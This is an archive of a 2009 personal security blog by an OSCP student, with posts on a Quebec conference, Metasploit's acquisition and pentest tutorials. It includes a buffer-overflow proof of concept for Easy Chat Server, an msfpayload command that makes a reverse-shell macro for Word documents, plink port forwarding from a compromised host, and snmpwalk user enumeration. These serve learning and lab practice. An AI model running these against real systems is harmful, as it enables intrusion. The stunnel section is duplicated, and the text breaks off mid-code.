After all the talks were done, the lock-picking and CTF started. I stuck around to see all the various laptops boot up and get ready for war. Seeing I have no experience in a CTF (the closest thing I've done is OSCP), it was quite impressive. Well organized, with enough hardware to supply all teams with an IP; the whole setup seemed to be ready in an hour. Great job guys! No waiting for the participants, I'm sure they appreciated it.
To finish this off now, I must say it was a great experience and something I hope they are able to redo next year. Canada/Quebec need conventions like these. We can't all afford to go to Shmoocon/DefCon. Not all employers are ready to send their admins to such events either. So my colleagues and I who attended this event feel that not only is this convention fun and useful, it's essential for Quebec's security consultants and techs to stay on top of the black-hats.
I spoke to Michel Cusin before leaving, congratulating him and offering any help he may need for next year's event. I truly believe in this event now. I hope he just remembers that a stranger took the time to offer his help. :)
Labels: convention, hackfest, infosec, pauldotcom, sans, security
Wednesday, November 4, 2009
str0ke 1974-04-29 - 2009-11-03
As reported on the Black Security blog not too long ago, Milw0rm's founder passed away from heart complications.
He leaves a wife and 4 children.
My thoughts and prayers go out to his wife and children, and the rest of his family. I never knew str0ke (1 email doesn't count as knowing someone), but as a fellow human being... a father... a husband, I can't help feeling saddened by this moment.
Please read Black Security's blog entry on the subject, for he is in a better position to talk about the situation.
May whatever god you believe in, str0ke, keep your soul safe and happy for the rest of eternity.
----
EDIT: It appears that this was someone's bad idea for a joke. Let's just hope this didn't cause him AND his family too much unwanted farewell e-mails...
Thanks ronin2307..
----
Sunday, October 25, 2009
Metasploit no longer a hobby
It's official: the Metasploit project conceived by HD Moore has been acquired by Rapid7, an information security company (better known for its vulnerability assessment product NeXpose).
What does this mean for the future of this great open source project that many have learned to love (and I suppose hate) over the years? Well, according to its creator it can only make it better. Having Metasploit go commercial means a budget, an actual QA department, a full-time dev team and more quality exploits.
Here are a few things that Rapid7 had to say:
"As a result of our union, we will be able to bring superior data on exploitability to our customers, helping them to prioritize and remediate key security issues. The exploit data will be directly embedded in our vulnerability management solution NeXpose, providing a whole new level of risk analysis capabilities to our clients, while ensuring that NeXpose, which will continue as a separate product, delivers the safest, most proactive and actionable vulnerability scanning capabilities in the industry."
That sounds pretty good, but something does bother me: "The exploit data will be directly embedded in our vulnerability management solution NeXpose." As far as I'm concerned, this means NeXpose will be feeding off Metasploit's better parts. Guess it's normal, they just acquired it and can probably do whatever they please, making NeXpose an even better product in the end. What will happen when Metasploit has nothing left to feed it? What will happen then?
"Finally, the combination of NeXpose and Metasploit will enable Rapid7 to continue to grow its relationship with partners and consultants..."
Does this mean, eventually Metasploit will depend on NeXpose? Should we expect sometime in the future a message saying something like "...this feature requires you install NeXpose..." ?
Another little bit that has brought me some concern comes from Moore's statement on his blog:
"From a user's perspective Metasploit will still be free. All of the important bits are going to remain open-source..."
Which important bits? Let's face it, the whole framework is pretty important and downright incredible. Will the exploits be Open Source? Will it be the framework's inner workings? I guess only time will tell...
Don't get me wrong, I am extremely happy for Mr. Moore and the rest of the Metasploit team. They created an Open Source application to help the community. If they can make money and continue working on something they started off as a hobby... Well, congratulations! I don't think anyone would object to that. Let's face it, having a piece of code (big or small) picked up by a commercial enterprise must be rewarding as hell.
My concern is what will happen to Metasploit down the road... after a few years. History has a tendency to repeat itself. In the past, Open Source projects acquired by commercial entities have been known to slowly, but surely, transform the Open Source product into a closed one. Of course this is not always the case.
Another thing, what will happen to Offensive Security's MSF certification? Will they have as much support and cooperation now to keep the study material up-to-date? Will they be limited by the bits of the project that will not be Open Source? Then again, it may not be affected at all.
_______
EDIT:
As mentioned by muts (Mati Aharoni, lead developer of Back|Track and CEO of Offensive Security), I guess MSFU won't suffer from Metasploit's acquisition. Sorry muts for not seeing (or reading) that detail.
Offensive Security Official MSF training partner
_______
So to end this, again congratulations are in order to the whole Metasploit team. I'm extremely happy for you all. Transforming a hobby into a career is not always easy.
Good luck, have fun
Metasploit/Rapid7 FAQ
Sunday, October 18, 2009
Recovering Firefox Passwords
A few weeks ago, Larry from Pauldotcom had a tech-segment about recovering Firefox passwords.
Seeing that this segment is well written, and it's a subject that always fascinates me, I see no point in trying to write up another when I could just link to it.
Pauldotcom, episode 166
Hope you enjoy it as much as I did.
Thursday, October 1, 2009
We don't mean to be insecure
Don't want to sound preachy, but system administrators and network administrators are not always to blame for insecure systems. Sometimes (often) the blame falls on the heads of management.
Keeping a system up to date, fully patched and properly configured afterwards will usually keep any system relatively secure... until the next exploit comes out and is made public.
Doing this takes time. One needs to make sure applied patches won't affect running services (i.e. Framework 3.5 SP1 on Citrix Presentation Server; this one seems solved now). Lots of reading and testing should be done before deploying major changes. For us, the tech guys, this is normal and the sensible thing to do. It's our job to keep things running smoothly... For management, time equals money... and they seem to always have the mentality "...if it ain't broke, don't fix it..." Of course, when a system gets compromised or crashes it's our fault for not applying the proper updates and patches.
Recently I had the pleasure of showing my current employer how easy it would be to compromise a customer's system. Without raising any alarms or triggering a malware/anti-virus application, I got a reverse shell on my home computer. Must admit, he was surprised how easy it was. Unfortunately nothing came out of that demonstration. I even spoke about a customer's FTP server, and how we should update it seeing the number of DoS exploits and local privilege escalation exploits currently in the wild... Again nothing.
So, from where I'm sitting we are not at fault. Pretty sure it's the same for others...
</rant>
Saturday, September 26, 2009
Little updates...
Some new, and not so new things to mention.
Firstly, Offensive Security's Metasploit Unleashed.
The course material, available free of charge here, is finally out. Sometime next month the exam and an additional course video will be made available for a small fee. It must be mentioned, the money raised by this course is donated to the "I Hack for Charity" created by Johnny Long. So by taking the course, you are not only learning to use a valuable penetration and assessment tool, you are giving to a good cause.
---
A little quickie on how to update Backtrack 4's kernel.
root@bt4# apt-get update
root@bt4# apt-get install -d linux-image
root@bt4# cd /var/cache/apt/archives/
root@bt4# dpkg -i --force-all linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb
root@bt4# apt-get dist-upgrade
I suggest a reboot here to see if all is good (you should see 2 kernels available at the grub screen).
root@bt4# apt-get remove --purge 2.6.29*
root@bt4# reboot
Again with Backtrack 4: If you plan on using Hydra (or XHydra) against SSH, you might be in for a little surprise. The stock version of Hydra distributed on BT4 is not compiled with the necessary SSH libraries. You'll need to recompile it. I found a nice how-to on the Remote Exploit forum (full thread). Also, it's the same for Medusa, so redoing that is needed as well...
# Download the hydra source, untar it, etc.
# ./configure
# nano Makefile
Edit the following lines to look like this; POSTGRES appears to be screwing stuff up in my case.
XDEFINES= -DLIBOPENSSL -DLIBSSH
XLIBS= -lssl -lssh -lcrypto
# make
# make install
If this doesn't work, do what I did... Download the library and read the error messages. It's all clearly explained...
----
A quick note: another Joomla exploit was released not too long ago (no big surprise), but what makes me mention it is the timing in which it came out. Seeing that I work for an ISP and Web/Application hosting company, being aware of these things can sometimes come in handy.
Two days after this exploit was published, I was asked by one of our partners, who needed a web space set up with Joomla. The boss told me to make it happen; knowing it was full of vulnerabilities, he said
"...put the latest version please...".
In response: "Sure, no problem, but I've just got to tell you that a remote exploit came out on that version 2 days ago".
It hasn't been installed.
Sometimes the power of knowledge and a little assurance in one's speech can go a long way.
Saturday, September 12, 2009
BoF Exercise
Something I enjoy doing, and which helps in understanding buffer overflows / exploit coding, is practice.
Grab a known vulnerable application, find a PoC (proof of concept) and start from there. Here's a start for anyone trying. Had loads of fun with this one:
Easy Chat Server 2.2
-First find and download the application (trial version should do fine) try -this-
-Install the application (make sure it works)
-Get a debugger (I suggest Ollydbg)
-Copy-paste this PoC; it's Python, but you can rewrite it in a language you may be more familiar with. Remember to change the IP/Port settings to your own Easy Chat Server
[this is based on his0k4 's exploit on milw0rm]
==================================================
#!/usr/bin/python
# Bug :
# EFS Easy Chat Server Authentication Request
# Buffer Overflow Exploit (SEH)
import socket

# 600 'A's overflow the username/password fields and overwrite the SEH record
buffer = '\x41' * 600
# Change these to your own Easy Chat Server
host = '192.168.1.200'
port = 8080

head = "GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=1 HTTP/1.1\r\n"
head += "Host: "+host+"\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send((head + "\r\n\r\n").encode())  # .encode() keeps this working under Python 3 as well
s.close()
==================================================
Got this to work under Windows XP Pro SP3 English. Good practice...
Use the links I provided in a previous post and have fun.
Good luck
Monday, September 7, 2009
BoF explained
Well, it's been a while since I've posted. Family and work are taking most of my time. Also started practicing with exploit code and buffer overflows: taking an application with a known vulnerability, then starting with a working PoC and writing an exploit from there.
I would love to take the time and write up my experiences in this matter, but seeing that there are hundreds of websites/posts on this subject, I'll just post 2 of my favorites. Well written and very understandable.
Peter Van Eeckhoutte's blog
i-Hacked.com 's article on SEH BoFs
Enjoy...
Sunday, August 2, 2009
A journey's End...
Well, my experience with Offsec 101 (or PWB) is complete. Finished the course material and the lab time. I took 60 days total, not knowing exactly what I was getting myself into. Also, this is not a course where one can just "pop in" for a few hours here and there. Complete concentration for several hours in a row is needed, and this every day.
This said, I'm pleased to announce that I passed the OSCP. Got my official results yesterday.
Can't go into details about the exam of course; like any certification, one agrees to (or signs) an NDA. But I suppose it's safe to say the major part of the exam is breaking into systems. It's public knowledge the exam is 24 hours, and one would be foolish not to take advantage of this. Also, one would be foolish not to take regular breaks and one or two naps. A tired mind is no good during this period. 24 hours may seem like a long time, but believe me it goes by quickly.
In the end, I accomplished enough of the requirements to pass the exam at hour 22. Took several 15 or 30 minute breaks, and a total sleep time of about 6 hours (2 hour nap, and a good sleep of 4). So it's very do-able without having to stay awake 24 hours straight.
My experience started on August 8th, 2009 at 10am EDT when I received my exam package with details on what needed to be accomplished. Like the lab environment, certain restrictions are laid out and specific tasks are given. Once I had understood the task(s) at hand, then I could panic. About 30 minutes later, I started hacking away at the lab the way the course showed me. I did not feel "confident" but prepared.
It was hit and miss for a while, lots of information gathered, then research needed to be made. After a while, boxes started giving me their most prized possession... administrative rights to their system.
At around 8am EDT the next day, I popped my last machine that gave me the necessary points (and then some) to unofficially pass the OSCP challenge... I could relax. From then on, I enjoyed myself a bit more... but didn't manage to get that last box I wanted (and I was close...). After another nap, I started to clean up my documentation and sent it on its way for evaluation. The rest is history.
Would like to thank ziplock, muts, bolexxx and the rest of the Offsec team for this great adventure. Also the IRC channel (#offsec) on freenode.net for the great support, kindness and occasional helping hand...
I highly recommend this certification. If you want to learn new skills, or test out what you know (or think you know) this is the one. It will make you think and adapt.
Good-to-have links
Here's a collection of links that are always useful to have handy:
www.milw0rm.com
www.securityfocus.com
www.securiteam.com
www.offensive-security.com (resource section)
www.packetstormsecurity.org
www.pauldotcom.com
www.metasploit.org
www.governmentsecurity.org
Now I'm sure there are more out there and would be worth adding to this list. If you've read my first post, you'll understand that I'm new to information security... hence my limited knowledge. Feel free to add, if someone ever comments.
Saturday, August 1, 2009
Msfpayload 'V' option
A few days ago, I saw this small video posted by John Strand from PSW about the V option in msfpayload and the EXE2VBS tool. As always, his videos are extremely interesting (although he does talk pretty fast in this one). Pauldotcom Ep 161
So basically this is a client-side attack, and in my opinion a pretty nasty one too. Every time I've seen someone open up a Word document or Excel spreadsheet, either downloaded off the Web or received via e-mail, 99% of the time they either let the macros run or already have the security settings set to low.
What does this mean? Well, using the "V" option in msfpayload will output the payload as VBScript. Then all one needs to do is insert it in a Word document. Once the file is opened, the payload is executed (provided the macro runs, of course).
I've actually tried it, and it's pretty funny (and scary) getting a reverse shell because I opened a Word document.
So here's a quick example of the syntax. If you are not familiar with Metasploit, I suggest you visit their site.
From your machine with the Metasploit framework installed:
bt framework3 # ./msfpayload windows/shell_reverse_tcp LHOST=10.1.10.53 V > /tmp/vbrshell.bas
Once the file is created, just insert that in a nice Word document.
Here's another video posted by Mark Baggett which explains the process.
Have fun, and remember to only use this on your local network or with permission of the person to whom you'll be sending such a file.
Friday, July 17, 2009
Firefox upgrades 3.5
Not long ago, Firefox released version 3.5... Happy news! Unfortunately a Heap Spray Vulnerability was found not long after... not good. Here's a small article on the subject -here-
Here's a proof of concept exploit to see the vulnerability in action:
Milw0rm
Fortunately for us, Firefox has issued an update. So don't forget to update your newly upgraded Firefox.
Wednesday, July 15, 2009
A little info about Sympatico Wifi
Nothing really technical today, just an opinion on a popular ISP in my area.
Bell Sympatico
When one subscribes, they are offered the choice to receive a wireless router. As an added bonus for people who may not be able to configure the device, it either comes pre-configured or a technician can swing by and set it up for you.
That's about the only good thing about the service. As Bob mentioned to me not long ago, he found a few security issues that alarmed me.
For starters, the router is configured by default with WEP, which can be easily cracked using aircrack. The default WEP key is actually the router's serial number. Lastly, and this is what made me jump, there is no username & password on the router... by default! As Bob was telling me, he managed to crack a few WEP keys and enter these "secure" routers provided by one of the biggest ISPs in Canada. The router has many options, such as opening and closing ports and redirecting traffic, just to name a few. The worst part: it never asks for a password when saving these new settings.
Another thing that surprised me is that this router also acts as the client's modem. So along with all the local network's information found on the device, you can also retrieve the username and password to the customer's internet connection.
I know for a fact that clients with no wireless devices often receive these routers so as to set up a local network easily. What does this mean? A vulnerable network, and who knows what it may contain and who may attack it. Now knowing all of this, what would stop someone from coding a virus/worm/trojan to take advantage of this? I don't know, I suppose it's possible, I mean look at Conficker and all it did (and is doing). In my opinion, ISPs giving away these insecure devices and not taking the time to configure them with a minimum of protection aren't helping.
They are probably, involuntarily of course, even helping the spread of malware on the net.
Saturday, July 11, 2009
Simple SSH tunnel
An SSH tunnel encrypts traffic and gives access to non-routable machines in a secure way.
Here's a nice wiki explaining the subject in more depth -here-
So let's imagine you've managed to receive a reverse shell from your target Windows machine. Once at the command prompt, you noticed other local ports open that were not available to you during your initial attack (how you got your reverse shell is not important).
Looking over the ports, you see port 3389 open on the system (of course other ports may be more interesting, but that would be better explained with Metasploit). The exercise here is how to reach this non-routed port from your machine, which is outside the network. The answer is a tunnel, and in our case an SSH tunnel.
First you'll need an SSH server on your system (the attacker) and an SSH client on your target. This example assumes that outgoing traffic isn't limited or monitored. Remember this is just a simple exercise that can be easily accomplished at home on your local network.
Let's start by getting a simple SSH client onto our Windows machine. There are many ways one can do this; I prefer using TFTP for two reasons: Windows usually comes with a TFTP client, and Backtrack has a nifty TFTP server readily available. (Note: one must always verify the upload/download options.)
So let's start by uploading our ssh client "plink.exe"
C:\>TFTP -i -your IP here- GET plink.exe
There's no progress bar, so you'll just have to wait for your prompt to come back once the upload is finished.
Now that you have your client, let's start our SSH connection. Make sure you have your listener set up.
C:\>plink -P 22 -l root -pw root -C -R 3389:127.0.0.1:3389 -your IP here-
Real quick: the -C puts compression on the connection, and the -R remotely forwards the port, so port 3389 on your SSH server now leads to 127.0.0.1:3389 on the Windows machine. The user and password should be set to your own on the SSH server.
If all went well you'll be back to your Linux prompt. Check to see what ports are now listening on your local machine, and you should see 3389 now.
Start up rdesktop and point it to 127.0.0.1 on port 3389 and you'll be rewarded with a nice remote desktop. One could use this method on other ports for other means.
As mentioned above, you can remotely forward other ports and run other applications. Imagine forwarding port 139 to your local machine.
Please remember to do this on your local network, as this implies that you port scanned your victim machine. Port scanning is considered illegal in certain parts of the world.
Tuesday, June 23, 2009
SSL & using stunnel
When connecting to port 995 (an e-mail server's SSL port) using a raw TCP connection, nothing will happen, since the server is expecting an SSL handshake rather than plain commands. So we could type anything we want after the connection is made, and nothing will happen. What we need to do is encapsulate our "traffic" in SSL. This can be done using stunnel. Visit the author's site, and have a look around.
If it's not installed on your Linux distribution then I recommend doing so. There's also a Windows version, which I also suggest getting if you want to test out creating a netcat session between 2 machines using stunnel.
Let's see how we can go about creating a simple chat session between 2 machines with netcat and stunnel. First we'll set up our listening machine to accept SSL connections on a specified port. Then we'll configure our client machine to accept traffic on a given port, take that traffic, encapsulate it in SSL and send it to the socket accepting SSL connections.
First open up stunnel's config file (I'm using my Linux machine as the client) and add/modify the following:
.../stunnel.conf
client = yes
[netcat client]
accept = 5555
connect = -Listening IP-:4444
...
Any traffic entering local port 5555 will be encapsulated in SSL and sent to the port named in the connect line on the listening machine's IP.
Now let's setup the stunnel service on our listening machine, in this case the Windows system.
.../stunnel.conf
client = no
[netcat server]
accept = 4444
connect = 7777
...
So now that we have stunnel setup on both machines, let's start the connection using netcat.
From our listening system, or server:
C:\>nc -vlp 7777
And now, let's connect from our Linux system:
Linux~# nc -nv 127.0.0.1 5555
If everything went according to plan, the Linux box connects to local port 5555, which is then encapsulated and sent to the listening machine's IP address, where an SSL connection is expected. One should now be able to "chat" between the two systems.
One can also receive a reverse shell this way, or connect to a pop3 mail server which only accepts SSL connections on the default port 995.
If it's not installed on your Linux distribution then I recommend doing so. There's also a Windows version, which I also suggest getting if you want to test out creating a netcat session between two machines through stunnel.
Let's see how we can go about creating a simple chat session between two machines with netcat and stunnel. We need two pieces: a listening machine that accepts SSL connections on a specified port, and a client machine that accepts plain traffic on a local port, encapsulates it in SSL and sends it to the socket accepting SSL connections. Let's start with the client.
First open up stunnel's config file (I'm using my Linux machine as the client) and add/modify the following:
.../stunnel.conf
client = yes
[netcat client]
accept = 5555
connect = -Listening IP-:4444
...
Any traffic entering local port 5555 will be encapsulated as SSL and sent to port 4444 on the listening IP, the port given in the connect line above.
Now let's set up the stunnel service on our listening machine, in this case the Windows system.
../stunnel.conf
client = no
[netcat server]
accept = 4444
connect = 7777
...
So now that we have stunnel setup on both machines, let's start the connection using netcat.
From our listening system, or server:
C:\>nc -vlp 7777
And now, let's connect from our Linux system:
Linux~# nc -nv 127.0.0.1 5555
If everything went according to plan, the Linux box connects to local port 5555, the traffic is encapsulated and sent to the listener's IP address, which is expecting an SSL connection. One should now be able to "chat" between the two systems.
One can also receive a reverse shell this way, or connect to a pop3 mail server which only accepts SSL connections on the default port 995.
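One thing the client config above does not say is whether stunnel should check the certificate the listener presents; without a verify level and a CA file, the client side will happily wrap its traffic for anyone who answers on port 4444. The following is an added example (not from the post and not part of stunnel) that parses a stunnel.conf and flags client sections that never authenticate the server. The option names verify, CAfile, CApath, verifyChain, verifyPeer, checkHost and checkIP are documented stunnel options (checkHost/checkIP appeared in stunnel 5); the two sample configs, the host name and the audit rules are my own constructions.

```python
import re

# Constructed sample: the client-side config from the post, with a placeholder host
WEAK_CLIENT_CONF = """\
client = yes
[netcat client]
accept = 5555
connect = listener.example.invalid:4444
"""

# Same service, plus the options that make stunnel check who it is talking to
HARDENED_CLIENT_CONF = """\
client = yes
[netcat client]
accept = 5555
connect = listener.example.invalid:4444
verify = 2
CAfile = /etc/stunnel/ca.pem
checkHost = listener.example.invalid
"""


def parse_stunnel_conf(text):
    """Split stunnel.conf into (global options, {service name: options}).

    Keys are lowercased because stunnel option names are case-insensitive;
    lines starting with ';' or '#' are comments.
    """
    global_opts, services = {}, {}
    current = global_opts
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        section = re.fullmatch(r"\[(.+)\]", line)
        if section:
            current = services.setdefault(section.group(1).strip(), {})
            continue
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        current[key.strip().lower()] = value.strip()
    return global_opts, services


def audit_stunnel_conf(text):
    """Return [(service, finding)] for client services that would trust any server."""
    global_opts, services = parse_stunnel_conf(text)
    findings = []
    for name, opts in services.items():
        eff = {**global_opts, **opts}  # service options override the global ones
        if eff.get("client", "no").lower() != "yes":
            continue  # only the client side decides whether the server is authenticated
        try:
            level = int(eff.get("verify", "0"))  # stunnel default: no verification
        except ValueError:
            level = 0
        verifies = (level >= 2
                    or eff.get("verifychain", "no").lower() == "yes"
                    or eff.get("verifypeer", "no").lower() == "yes")
        if not verifies:
            findings.append((name, "server certificate is never verified: add verify = 2 "
                                   "(or verifyChain/verifyPeer) and a CAfile"))
        elif not (eff.get("cafile") or eff.get("capath")):
            findings.append((name, "verification enabled but no CAfile/CApath configured"))
        if "checkhost" not in eff and "checkip" not in eff:
            findings.append((name, "no checkHost/checkIP: any certificate the CA issued "
                                   "would be accepted for this connection"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CLIENT_CONF), ("hardened", HARDENED_CLIENT_CONF)):
        print(label, audit_stunnel_conf(conf) or "no findings")
```

Run it against your own stunnel.conf by passing the file contents to audit_stunnel_conf; the server side needs its cert and key as the post's Windows config implies, and the client side needs the CA that signed that cert before verify = 2 will let the connection through.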
Sunday, June 21, 2009
SNMP Protocol & snmpwalk
SNMP is a management protocol often used to monitor and remotely configure servers and other network devices such as switches, routers, etc.
This protocol has a weak authentication system: public and private community strings.
- The public community string can read information from an SNMP-enabled device
- The private community string can often reconfigure a device
Scanning machines with snmp enabled can give interesting results if improperly configured. Many tools exist, but the one I was exposed to during my Offensive Security course was snmpwalk.
Scanning a Windows system running snmp.
From our Linux machine's shell, we would type the following command to scan a single machine.
linux~#snmpwalk -c public -v1 -target IP-
This can return information such as running services, and/or installed applications. Also somewhere in the output, we could find the operating system's version. It can be a very long output, so using grep is a good idea.
linux~#snmpwalk -c public -v1 -target IP- | grep sysDescr.0
One can also enumerate users with snmpwalk:
linux~#snmpwalk -c public -v1 -target IP- 1 | grep 77.1.2.25 | cut -d" " -f4
Enumerating services with snmpwalk:
linux~#snmpwalk -c public -v1 -target IP- 1 | grep hrSWRunName | cut -d" " -f4
Enumerating TCP ports:
linux~#snmpwalk -c public -v1 -target IP- 1 | grep tcpConnState | cut -d" " -f4
And enumerating installed applications:
linux~#snmpwalk -c public -v1 -target IP- 1 | grep hrSWInstalledName | cut -d" " -f4
In the syntax above, the switches -c and -v are used. The first, -c, indicates which community string to use: public or private. The second, -v, tells the tool which version of SNMP to use, in this case version 1. We also tell it to start at the root of the MIB tree by adding "1" after the target's IP address. See the top of this post for a wiki link on the MIB tree.
Of course, one can use the following script, "snmpcheck", to gather most or all of the available information in a more human-readable format.
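The grep | cut pipelines above work because net-snmp prints one `OID = TYPE: value` line per object, and `cut -d" " -f4` takes the first word of the value. That truncates any value containing spaces (an installed application called "Internet Explorer 6" comes out as "Internet, quotes included). The following added example, which is not part of the post or of snmpwalk, parses that line format properly and groups the results the way the post's five commands do; it is the kind of parser a defender can run over a walk of their own devices to see what a public community string exposes. The sample output is constructed, not captured from a real host; the OID prefix 77.1.2.25 is the LanMgr MIB user table, which is why the post greps for it.

```python
import re

# Constructed sample of net-snmp style snmpwalk output (not captured from a real host)
SAMPLE_WALK = """\
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 6 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0
SNMPv2-MIB::sysName.0 = STRING: LABHOST
SNMPv2-SMI::enterprises.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
HOST-RESOURCES-MIB::hrSWRunName.8 = STRING: "System"
HOST-RESOURCES-MIB::hrSWRunName.1024 = STRING: "svchost.exe"
HOST-RESOURCES-MIB::hrSWInstalledName.1 = STRING: "Internet Explorer 6"
HOST-RESOURCES-MIB::hrSWInstalledName.2 = STRING: "Security Update for Windows"
TCP-MIB::tcpConnState.0.0.0.0.135.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.445.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.10.0.0.5.139.10.0.0.9.1055 = INTEGER: established(5)
"""

# OID = TYPE: value  (the TYPE part is absent for some objects, e.g. "No Such Object")
LINE_RE = re.compile(r"^(?P<oid>\S+) = (?:(?P<type>[A-Za-z0-9-]+): )?(?P<value>.*)$")


def parse_snmpwalk(text):
    """Turn snmpwalk lines into dicts with module, object, index, type and value.

    The whole value is kept and surrounding quotes are removed, which is
    exactly where `cut -d" " -f4` loses data on strings that contain spaces.
    """
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        oid = m.group("oid")
        module, sep, rest = oid.partition("::")
        if not sep:  # numeric output (snmpwalk -On) has no MODULE:: prefix
            module, rest = "", oid
        obj, _, index = rest.partition(".")
        value = m.group("value").strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        rows.append({"module": module, "object": obj, "index": index,
                     "type": m.group("type"), "value": value})
    return rows


def shell_cut_field4(line):
    """What the post's `cut -d" " -f4` prints for one line, for comparison."""
    fields = line.split(" ")
    return fields[3] if len(fields) > 3 else ""


def summarize(rows):
    """Group a walk the way the post's five grep pipelines do."""
    out = {"sysDescr": None, "users": [], "processes": [], "installed": [], "listening_tcp": []}
    for r in rows:
        if r["object"] == "sysDescr":
            out["sysDescr"] = r["value"]
        elif r["object"] == "enterprises" and r["index"].startswith("77.1.2.25."):
            out["users"].append(r["value"])  # LanMgr MIB user table (the grep 77.1.2.25)
        elif r["object"] == "hrSWRunName":
            out["processes"].append(r["value"])
        elif r["object"] == "hrSWInstalledName":
            out["installed"].append(r["value"])
        elif r["object"] == "tcpConnState" and r["value"].startswith("listen"):
            # index = localAddr (4 octets) . localPort . remoteAddr (4 octets) . remotePort
            out["listening_tcp"].append(int(r["index"].split(".")[4]))
    return out


if __name__ == "__main__":
    summary = summarize(parse_snmpwalk(SAMPLE_WALK))
    for key, value in summary.items():
        print(f"{key}: {value}")
    print("cut -f4 would give:", shell_cut_field4(SAMPLE_WALK.splitlines()[6]))
```

To use it on real output, save the walk to a file (`snmpwalk -c public -v1 host 1 > walk.txt`) and pass its contents to parse_snmpwalk. The summary is a quick way to confirm that a device answering to the public community string is not leaking more than you expect.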
Saturday, June 20, 2009
Simple Netcat usage
Netcat is a powerful tool that everyone should learn to use. I've only been aware of this tool for about a month now, and already I'm finding way to use it (or situations where it could be useful) at work.
Netcat is able to connect (read/write) to any port using the TCP or UDP protocols. One can send and receive files, scan ports, and even redirect standard input/output/error with netcat. It's also possible to use netcat for port redirection.
Here are few interesting articles about Netcat:
GIAC
Wikipedia
Here are a few simple examples of the netcat syntax. Let's look at transferring a text file from a Windows machine to a Linux machine. Of course, we'll assume the Windows system has a copy of netcat.
First, the Linux machine receiving the file needs to set up a listener.
linux~#nc -lvp 4444 > output.txt
Any traffic directed to port 4444 will be directed into the output.txt file.
Second, the Windows system will open a connection and send the text file.
C:\>nc -nv -Linux IP here- 4444 < test.txt
The contents of test.txt will be piped into port 4444, and sent to our listening Linux machine.
Now netcat doesn't have any "progress bar" to show when the transfer is complete, so you need to guess and kill the connection manually with the CTRL-C key combination.
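Two things make the transfer above easier to trust: an end-of-stream signal so the receiver knows the file is complete, and a hash comparison on both ends so you know nothing was cut off by an early CTRL-C. The following is an added example, not part of the post or of netcat, that does the same job in Python on loopback: the receiver writes until it sees EOF, the sender half-closes the socket after the last byte (the signal netcat leaves to you), and both files are hashed with SHA-256. The file contents and names are constructed for the demo.

```python
import hashlib
import os
import socket
import tempfile
import threading


def sha256_file(path):
    """Hash a file in chunks; compare this on both ends after any transfer."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def receive_to_file(listener, out_path):
    """Like `nc -lvp PORT > output.txt`: accept one connection and write every
    byte until the sender's EOF (recv returns b"") says the transfer is done."""
    conn, _ = listener.accept()
    with conn, open(out_path, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:
                break
            out.write(chunk)


def send_file(host, port, path):
    """Like `nc HOST PORT < test.txt`, plus the half-close that marks the end:
    the receiver sees EOF instead of waiting for someone to press CTRL-C."""
    with socket.create_connection((host, port)) as s, open(path, "rb") as f:
        s.sendfile(f)
        s.shutdown(socket.SHUT_WR)


def transfer_and_verify(src_path, dst_path):
    """Run receiver and sender on loopback; return (sender hash, receiver hash)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # ephemeral port so the demo never collides
    listener.listen(1)
    port = listener.getsockname()[1]
    receiver = threading.Thread(target=receive_to_file, args=(listener, dst_path))
    receiver.start()
    send_file("127.0.0.1", port, src_path)
    receiver.join(timeout=10)
    listener.close()
    return sha256_file(src_path), sha256_file(dst_path)


def demo_transfer(payload=b"netcat test file\n" * 4096):
    """Create a constructed test.txt, transfer it, and report (hashes match, bytes received)."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "test.txt")
        dst = os.path.join(tmp, "output.txt")
        with open(src, "wb") as f:
            f.write(payload)
        sent, received = transfer_and_verify(src, dst)
        with open(dst, "rb") as f:
            got = f.read()
    return sent == received, len(got)


if __name__ == "__main__":
    ok, size = demo_transfer()
    print("hashes match:", ok, "| bytes received:", size)
```

With real netcat the equivalent check is to hash the file on the sending side and run sha256sum on output.txt after you stop the listener; if the digests differ, the connection was cut before the last bytes arrived. Some netcat builds have an option to close the connection once stdin hits EOF, which gives the receiver the same signal as the shutdown call above.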
Banner grabbing with netcat is pretty simple. All one needs to do is connect to the specified IP address and port. Once connected, depending on the port one used, commands can be issued to gather more information. Of course, not all services give out banners, and system administrators can always remove the banner. Let's look at how one can retrieve an SMTP banner.
linux~#nc -nv -IP address- 25
Sometimes, but not always, the SMTP server will give out information such as:
Sendmail 8.13.1/8.13.1
One can also type in commands once connected to verify the existence of users.
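Since not every service speaks first, a banner grab needs a timeout so a quiet listener is reported as quiet rather than hanging the session. The following added example (not part of the post or of netcat) does the grab in Python and distinguishes a service that volunteers a banner, one that stays silent, and a port where nothing accepts; it starts two loopback services of its own for the demo. The Sendmail version string is the one the post mentions; the host name and the rest of the banner are constructed. This is also a handy way to confirm that a banner you removed from your own server really is gone.

```python
import socket
import threading

# Constructed banner; the Sendmail version string is the one the post quotes
SMTP_BANNER = b"220 mail.example.invalid ESMTP Sendmail 8.13.1/8.13.1; ready\r\n"


def grab_banner(host, port, timeout=3.0, max_bytes=1024):
    """Connect, send nothing, and report what the service volunteers.

    Returns ("banner", text) if the service speaks first, ("silent", None) if it
    says nothing before the timeout, or ("refused", None) if nothing accepts.
    """
    try:
        conn = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return ("refused", None)
    with conn:
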